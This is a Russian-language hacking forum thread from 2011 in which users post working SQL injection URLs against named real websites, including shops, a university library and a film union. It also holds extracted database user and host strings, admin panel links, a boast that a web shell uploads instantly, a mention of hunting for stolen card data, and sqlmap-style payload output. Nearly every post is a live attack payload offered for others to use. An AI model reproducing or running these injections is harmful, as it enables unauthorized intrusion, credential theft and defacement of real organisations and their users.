 |
|
29.11.2011, 08:13
|
|
Познающий
Регистрация: 03.11.2011
Сообщений: 83
С нами:
7644566
Репутация:
11
|
|
SHOP
Код HTML:
http://www.locknlock.com.au/products_c.php?cate1=5&cate2=1&item_seqno=-219+UniOn+sEleCt+antidef+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),user(),con_cat_ws(0x3a,seqno,adminid,passwd,status,grade),21,22,23,24,25,26,database()+from+admin_01t+LiMit+1,1
Код HTML:
http://www.locknlock.com.au/admin/
шелл льется за 0,00001 сек
З.Ы. По правилам нельзя выкладывать пасс/хэш. А я и не выкладывал =) Но все же поставил защиту
|
|
|
29.11.2011, 08:17
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 1
С нами:
10035004
Репутация:
0
|
|
Сообщение от tabletkO
SHOP
шелл льется за 0,00001 сек
Семён Семёныч... нельзя такие скули выкладывать по правилам.. Школоло задефейсит..
И чтобы не быть голословным:
Толка ноль, но ради количества таблиц стоит посмотреть))
Сообщение от None
http://sayna.depar.ru/profile_view.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22+from+information_sc hema.tables--
Сообщение от None
http://www.abi-nn.ru/profile_view.php?id=-1+union+select+1,2,3,name,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+from+users--
|
|
|
|
29.11.2011, 13:39
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от None
http://www.garo.cc/item.php?id=-879+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,0,1,2+--+
5.0.90-log:u7114@10.8.1.184:u7114 0
|
|
|
|
29.11.2011, 14:17
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от None
http://www.unitedparts.ru/catalog.php?id=2+union+select+table_name,2,3,4+fro m+information_schema.tables
4 символа
|
|
|
|
29.11.2011, 21:18
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
сегодня решил поискать картона...
нашел пару бесполезных для такого дела скулей...
шлю вам)
админка прилагается)
P.S.: крутил только до версии, дальше думаю все понятно, т.к. mysql=>5
типо нашего avito.ru
Сообщение от None
http://www.fast-buy-sell.com/view_ad.php?id=-1178+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t_ws(0x3a,version(),database(),user()),14,15,16,17 ,18,19,20,21,22,23
Сообщение от None
http://tourkiev.com/chernobyltour/showdate.php?id=-531+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11
|
|
|
|
29.11.2011, 22:58
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 0
С нами:
8498983
Репутация:
0
|
|
Флэш-игры
Сообщение от None
http://www.swfplay.net/game.php?id=28) AND (SELECT 7673 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,98,118,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,115,115,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7357=7357
PR=3 |
|
|
|
30.11.2011, 01:33
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 1
С нами:
10035004
Репутация:
0
|
|
Интересная какаято хрень.. вычитываются все базы хостинга..
Сообщение от None
http://www.springfieldpccc.com/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34+
|
|
|
|
30.11.2011, 06:05
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 1
С нами:
10035004
Репутация:
0
|
|
Домен ничего так.
Версия базы 5
но шанс залить чтото похоже ничтожен.
Сообщение от None
http://www.ccrw.org/conference/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--
Еще кое что:
Версия базы 4, админку не нашел..
Тиц 10
Сообщение от None
http://www.kobyakoffstudio.ru/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,user%28%29--
|
|
|
|
30.11.2011, 08:33
|
|
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
С нами:
9260607
Репутация:
66
|
|
Код:
http://www.libraries.wvu.edu/databases/database.php?id=-361+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
systems@localhost:5.0.77:databases
Google PR: 6
Код:
http://www.rosalcohol.ru/site.php?id=-28+union+select+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7%20from%20users--&table=cHJpdl9vdHI=
rosalc_ria-arbitr_ru@zvm34.host.ru:4.0.27-log:rosalc_ria-arbitr_ru
Google PR: 3 ТИц: 130 |
|
|
|
30.11.2011, 11:53
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 0
С нами:
8498983
Репутация:
0
|
|
Національна спілка кінематографістів України
Сообщение от None
http://www.ukrkino.com.ua/news.php?id=2196
[QUOTE="None"]
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2196 AND 3755=3755
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2196 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,105,107,112,58)
,IFNULL(CAST(CHAR(114,105,79,117,70,72,119,101,79, 115) AS CHAR),CHAR(32)),CHAR(5
8,119,101,105,58)), NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
